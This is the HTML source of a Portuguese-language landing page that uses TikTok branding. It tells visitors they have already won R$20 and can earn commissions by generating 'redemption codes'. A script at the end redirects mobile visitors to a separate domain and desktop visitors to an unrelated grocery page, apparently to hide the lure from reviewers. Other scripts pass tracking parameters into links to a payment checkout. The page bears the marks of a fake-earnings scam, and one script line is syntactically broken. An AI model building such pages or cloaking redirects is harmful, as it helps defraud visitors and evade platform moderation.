<!DOCTYPE html>
<html lang="pt-BR" dir="ltr">

<head>
    <meta name="robots" content="index, follow">
    <link rel="shortcut icon" href="">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Códigos Lucrativos</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link
        href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800&amp;family=Roboto:wght@300;400;500;600;700;800&amp;family=Montserrat:wght@300;400;500;600;700;800&amp;display=swap"
        rel="stylesheet" media="print" onload="this.onload=null;this.removeAttribute('media');">
    <style>
        @media (max-width:640px) {
            .atm-hidden-mobile {
                display: none
            }
        }

        @media (min-width:640px) {
            .atm-hidden-desktop {
                display: none
            }
        }

        .col-span-1 {
            grid-column: span 1 / span 1;
        }

        .col-span-2 {
            grid-column: span 2 / span 2;
        }

        .items-center {
            align-items: center
        }

        .grid-cols-6 {
            grid-template-columns: repeat(6, minmax(0, 1fr))
        }

        .grid-cols-5 {
            grid-template-columns: repeat(5, minmax(0, 1fr))
        }

        .grid-cols-4 {
            grid-template-columns: repeat(4, minmax(0, 1fr))
        }

        .grid-cols-2 {
            grid-template-columns: repeat(2, minmax(0, 1fr))
        }

        .grid-cols-3 {
            grid-template-columns: repeat(3, minmax(0, 1fr))
        }

        .grid-cols-1 {
            grid-template-columns: repeat(1, minmax(0, 1fr))
        }

        .grid {
            display: grid
        }

        .basis-1\/2 {
            flex-basis: 50%
        }

        .flex {
            display: flex
        }

        .gap-1 {
            gap: 4px
        }

        .gap-2 {
            gap: 8px
        }

        .gap-4 {
            gap: 16px
        }

        .gap-6 {
            gap: 24px
        }

        .gap-12 {
            48px
        }

        .gap-24 {
            gap: 96px
        }

        .justify-center {
            justify-content: center
        }

        .basis-full {
            flex-basis: 100%
        }

        html {
            scroll-behavior: smooth;
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            -webkit-tap-highlight-color: transparent
        }

        body,
        center,
        dd,
        del,
        div,
        dt,
        em,
        footer,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        i,
        iframe,
        img,
        p,
        q,
        s,
        small,
        span,
        strike,
        strong,
        sub,
        sup,
        table,
        tbody,
        td,
        tr,
        u {
            margin: -1px 0 0 0;
            padding: 0;
            border: 0;
            font-size: 100%;
            font: inherit;
            vertical-align: baseline;
            font-family: Roboto, sans-serif
        }

        .u {
            -moz-user-select: none;
            -webkit-user-select: none;
            cursor: default
        }

        table {
            border-collapse: collapse;
            border-spacing: 0
        }

        body {
            line-height: 1
        }

        body {
            background-color: #F0F2F5;
            overflow-x: hidden
        }

        iframe,
        img,
        svg {
            max-width: 100%
        }

        h1,
        h1 b,
        h1 span,
        h2,
        h2 b,
        h2 span,
        h3,
        h3 b,
        h3 span {
            font-family: Poppins, sans-serif
        }

        a {
            text-decoration: none;
            font-family: Roboto, sans-serif
        }

        a.btn {
            font-family: Montserrat, sans-serif
        }

        em span.lg,
        em span.md,
        em span.sm {
            font-style: italic
        }

        @media (max-width:600px) {

            .flex-large,
            .flex-small {
                margin-right: 0 !important;
                margin-bottom: 16px
            }
        }

        .flexrow {
            display: flex;
            flex-direction: row;
            flex-wrap: wrap;
            align-items: center
        }

        .flex-large,
        .flex-small {
            flex-basis: 100%
        }

        .flex-large:last-child,
        .flex-small:last-child {
            margin-right: 0 !important
        }

        @media (min-width:600px) {
            .flex-small {
                flex: 1;
                margin-bottom: 0 !important;
                padding-bottom: 0 !important
            }

            .flex-small.half {
                flex: 0 0 calc(1 / 2 * 100%)
            }

            .flex-small.one-fifth {
                flex: 0 0 calc(1 / 5 * 100%)
            }

            .flex-small.two-fifths {
                flex: 0 0 calc(2 / 5 * 100%)
            }

            .flex-small.one-fourth {
                flex: 0 0 calc(1 / 4 * 100%)
            }

            .flex-small.two-fourths {
                flex: 0 0 calc(2 / 4 * 100%)
            }

            .flex-small.three-fourths {
                flex: 0 0 calc(3 / 4 * 100%)
            }

            .flex-small.one-third {
                flex: 0 0 calc(1 / 3 * 100%)
            }

            .flex-small.two-thirds {
                flex: 0 0 calc(2 / 3 * 100%)
            }
        }

        @media (min-width:1000px) {
            .flex-large {
                flex: 1;
                margin-bottom: 0
            }

            .flex-large.half {
                flex: 0 0 calc(1 / 2 * 100%)
            }

            .flex-large.one-fifth {
                flex: 0 0 calc(1 / 5 * 100%)
            }

            .flex-large.two-fifths {
                flex: 0 0 calc(2 / 5 * 100%)
            }

            .flex-large.one-fourth,
            .flex-large.two-fourths {
                flex: 0 0 calc(1 / 4 * 100%)
            }

            .flex-large.three-fourths {
                flex: 0 0 calc(3 / 4 * 100%)
            }

            .flex-large.one-third {
                flex: 0 0 calc(1 / 3 * 100%)
            }

            .flex-large.two-thirds {
                flex: 0 0 calc(2 / 3 * 100%)
            }
        }

        @media (min-width:640px) {
            .sm\:gap-1 {
                gap: 6px
            }

            .sm\:gap-2 {
                gap: 12px !important
            }

            .sm\:gap-4 {
                gap: 24px
            }

            .sm\:gap-6 {
                gap: 32px
            }

            .sm\:gap-12 {
                gap: 64px
            }

            .sm\:gap-24 {
                gap: 128px
            }

            .sm\:grid-cols-6 {
                grid-template-columns: repeat(6, minmax(0, 1fr))
            }

            .sm\:grid-cols-5 {
                grid-template-columns: repeat(5, minmax(0, 1fr))
            }

            .sm\:grid-cols-4 {
                grid-template-columns: repeat(4, minmax(0, 1fr))
            }

            .sm\:grid-cols-2 {
                grid-template-columns: repeat(2, minmax(0, 1fr))
            }

            .sm\:grid-cols-3 {
                grid-template-columns: repeat(3, minmax(0, 1fr))
            }

            .sm\:grid-cols-1 {
                grid-template-columns: repeat(1, minmax(0, 1fr))
            }
        }
    </style>
    <script src="js/a.js" async=""></script>
</head>

<body id="_s0XDmoI54RTUIJyk1utvkuYYmZh1" data-page="_CaWoK5EuweuSB1ebNRHk">
    <style>
        .hmFcKe4034274 {
            display: none
        }

        @media (max-width: 640px) {
            html {
                overflow-x: hidden
            }
        }
    </style>
    <div class="division-WbohpY6929275__wrapper">
        <style>
            #division-WbohpY6929275 {
                border: none;
                border-radius: ;
                margin: 0;
                position: relative;
                padding: 5vh 20vw 3vh 20vw;
                background-color: #000000;
            }

            @media (max-width:1200px) {
                #division-WbohpY6929275 {
                    padding: 3.75vh 15vw 2.25vh 15vw;
                    margin: 0;
                }
            }

            @media (max-width:600px) {
                #division-WbohpY6929275 {
                    margin: 0;
                    padding: 2.25vh 1.5vw 1.5vh 1.5vw;
                }
            }
        </style>
        <div id="division-WbohpY6929275" class="pnKHBl4025169">
            <div class="image-DKJDLb7583581">
                <style>
                    .image-DKJDLb7583581-element img {
                        display: block;
                        margin-left: auto;
                        margin-right: auto;
                        margin-bottom: 0.25vh;
                        margin-top: 0.25vh;
                        max-width: 40%;
                        border-radius: 0;
                        border: none;
                    }

                    @media (max-width: 1200px) {
                        .image-DKJDLb7583581-element img {
                            max-width: 36%;
                        }
                    }

                    @media (max-width: 600px) {
                        .image-DKJDLb7583581-element img {
                            max-width: 60%;
                            margin-left: auto;
                            margin-right: auto;
                        }
                    }
                </style>
                <div class="image-DKJDLb7583581-element">
                    <img loading="lazy" src="https://mmgsolutions.com.br/wp-content/uploads/2022/10/Logo-Tiktok-Branco.png" alt="">
                </div>
            </div>
        </div>
    </div>
    <div class="division-GMGQxS7594296__wrapper">
        <style>
            #division-GMGQxS7594296 {
                border: none;
                border-radius: ;
                margin: 0;
                position: relative;
                padding: 3vh 20vw 3vh 20vw;
                background-color: #F0F2F5;
            }

            @media (max-width:1200px) {
                #division-GMGQxS7594296 {
                    padding: 2.25vh 15vw 2.25vh 15vw;
                    margin: 0;
                }
            }

            @media (max-width:600px) {
                #division-GMGQxS7594296 {
                    margin: 0;
                    padding: 3vh 3.75vw 1.5vh 3.75vw;
                }
            }
        </style>
        <div id="division-GMGQxS7594296" class="HlyomJ4025170">
            <div class="image-vYzjet6993487">
                <style>
                    .image-vYzjet6993487-element img {
                        display: block;
                        margin-left: auto;
                        margin-right: auto;
                        margin-bottom: 0.25vh;
                        margin-top: 0.25vh;
                        max-width: 20%;
                        border-radius: 0;
                        border: none;
                    }

                    @media (max-width: 1200px) {
                        .image-vYzjet6993487-element img {
                            max-width: 18%;
                        }
                    }

                    @media (max-width: 600px) {
                        .image-vYzjet6993487-element img {
                            max-width: 50%;
                            margin-left: auto;
                            margin-right: auto;
                        }
                    }
                </style>
                <div class="image-vYzjet6993487-element">
                    <img loading="lazy" src="https://facenamespace.online/images/hlPvgh3399316.png" alt="">
                </div>
            </div>
            <div class="headline-kXnPcI0716633">
                <style>
                    .headline-kXnPcI0716633-element h1 {
                        font-size: 2.31vw;
                        text-align: center;
                        padding-top: 2vh;
                        padding-bottom: 2vh;
                        color: #000000;
                        line-height: 1.2;
                        font-weight: 500;
                        false
                    }

                    @media (max-width: 1200px) {
                        .headline-kXnPcI0716633-element h1 {
                            font-size: 2.80vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                        }
                    }

                    @media (max-width: 640px) {
                        .headline-kXnPcI0716633-element h1 {
                            font-size: 7.50vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                            text-align: center;
                        }
                    }
                </style>
                <div class="headline-kXnPcI0716633-element headline">
                    <h1>
                        <b>Parabéns!</b>
                    </h1>
                </div>
            </div>
            <div class="headline-IDjcyI0879562">
                <style>
                    .headline-IDjcyI0879562-element h1 {
                        font-size: 2.31vw;
                        text-align: center;
                        padding-top: 2vh;
                        padding-bottom: 2vh;
                        color: #000000;
                        line-height: 1.2;
                        font-weight: 500;
                        false
                    }

                    @media (max-width: 1200px) {
                        .headline-IDjcyI0879562-element h1 {
                            font-size: 2.80vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                        }
                    }

                    @media (max-width: 640px) {
                        .headline-IDjcyI0879562-element h1 {
                            font-size: 5.60vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                            text-align: center;
                        }
                    }
                </style>
                <div class="headline-IDjcyI0879562-element headline">
                    <h1>
                        Você vai ganhar comissões para gerar códigos de resgate para empresas!<br><b>Aproveite, você já ganhou
                            R$20,00!</b>
                    </h1>
                </div>
            </div>
            <div class="headline-LQsbXE6715231">
                <style>
                    .headline-LQsbXE6715231-element h1 {
                        font-size: 2.31vw;
                        text-align: center;
                        padding-top: 2vh;
                        padding-bottom: 2vh;
                        color: #000000;
                        line-height: 1.2;
                        font-weight: 500;
                        false
                    }

                    @media (max-width: 1200px) {
                        .headline-LQsbXE6715231-element h1 {
                            font-size: 2.80vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                        }
                    }

                    @media (max-width: 640px) {
                        .headline-LQsbXE6715231-element h1 {
                            font-size: 5.60vw;
                            padding-top: 1.5vh;
                            padding-bottom: 1.5vh;
                            text-align: center;
                        }
                    }
                </style>
                <div class="headline-LQsbXE6715231-element headline">
                    <h1>
                        <b>Gere 3 códigos e realize seu primeiro saque!</b>
                    </h1>
                </div>
            </div>
            <div class="button-osrtNK0996897">
                <style>
                    a.button-osrtNK0996897-element {
                        background-color: #144425;
                        border-radius: 8px;
                        border: none;
                        color: #ffffff;
                        padding: 16px 32px 16px 32px;
                        font-weight: 600;
                        display: block;
                        width: fit-content;
                        text-align: center;
                        margin: 3vh auto 2vh auto;
                        font-size: 1.49vw;
                        box-sizing: border-box;
                        max-width: 100%;
                        transition: all 0.5s ease-in-out;
                    }

                    a.button-osrtNK0996897-element:hover {
                        filter: brightness(1.2);
                    }

                    @media (max-width: 1200px) {
                        a.button-osrtNK0996897-element {
                            font-size: 1.69vw;
                            margin: 1.98vh auto 1.5vh auto;
                            padding: 8px 16px 8px 16px;
                        }
                    }

                    @media (max-width: 640px) {
                        a.button-osrtNK0996897-element {
                            font-size: 4.13vw;
                            padding: 12px 24px 12px 24px;
                            margin: 1.5vh auto 1vh auto;
                        }
                    }
                </style>
                <a href="../assets/form-1.html" target="_self" class="btn button-osrtNK0996897-element ">
                    COMEÇAR
                </a>
            </div>
        </div>
    </div>
    <!-- <script src="js/hmFcKe4034274.js" charset="utf-8"></script> -->
    <script>document.addEventListener("DOMContentLoaded", () => { document.querySelectorAll("a").forEach(e => { let t = e.getAttribute("href"); if (t.includes("#")) return; let l = new URLSearchParams(window.location.search), r = new URLSearchParams(t.includes("?") ? t.split("?")[1] : ""); for (let [n, i] of l) r.set(n, i); let o = t.includes("?") ? "&" : "?"; e.setAttribute("href", t.split("?")[0] + o + r.toString()) }) });</script>
        <script>

            let prefix = ["https://go.perfectpay.com.br/"];
        
            function getParams() {
                let t = "",
                    e = window.top.location.href,
                    r = new URL(e);
                if (null != r) {
                    let a = r.searchParams.get("utm_source"),
                        n = r.searchParams.get("utm_medium"),
                        o = r.searchParams.get("utm_campaign"),
                        m = r.searchParams.get("utm_term"),
                        c = r.searchParams.get("utm_content"); - 1 !== e.indexOf("?") && (t = &sck=${a}|${n}|${o}|${m}|${c}), console.log(t)
                }
                return t
            }! function() {
                var t = new URLSearchParams(window.location.search);
                t.toString() && document.querySelectorAll("a").forEach(function(e) {
                    for (let r = 0; r < prefix.length; r++) - 1 !== e.href.indexOf(prefix[r]) && (-1 === e.href.indexOf("?") ? e.href += "?" + t.toString() + getParams() : e.href += "&" + t.toString() + getParams())
                })
            }();
        
        </script>

<script type="text/javascript">
    // Verifica o tipo de dispositivo com base no User-Agent
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        window.location.href = "https://saldoareceber.fun/codigos-2/principal/index.html"; // Dispositivo móvel
    } else {
        window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Desktop
    }
</script>
</body>

</html>
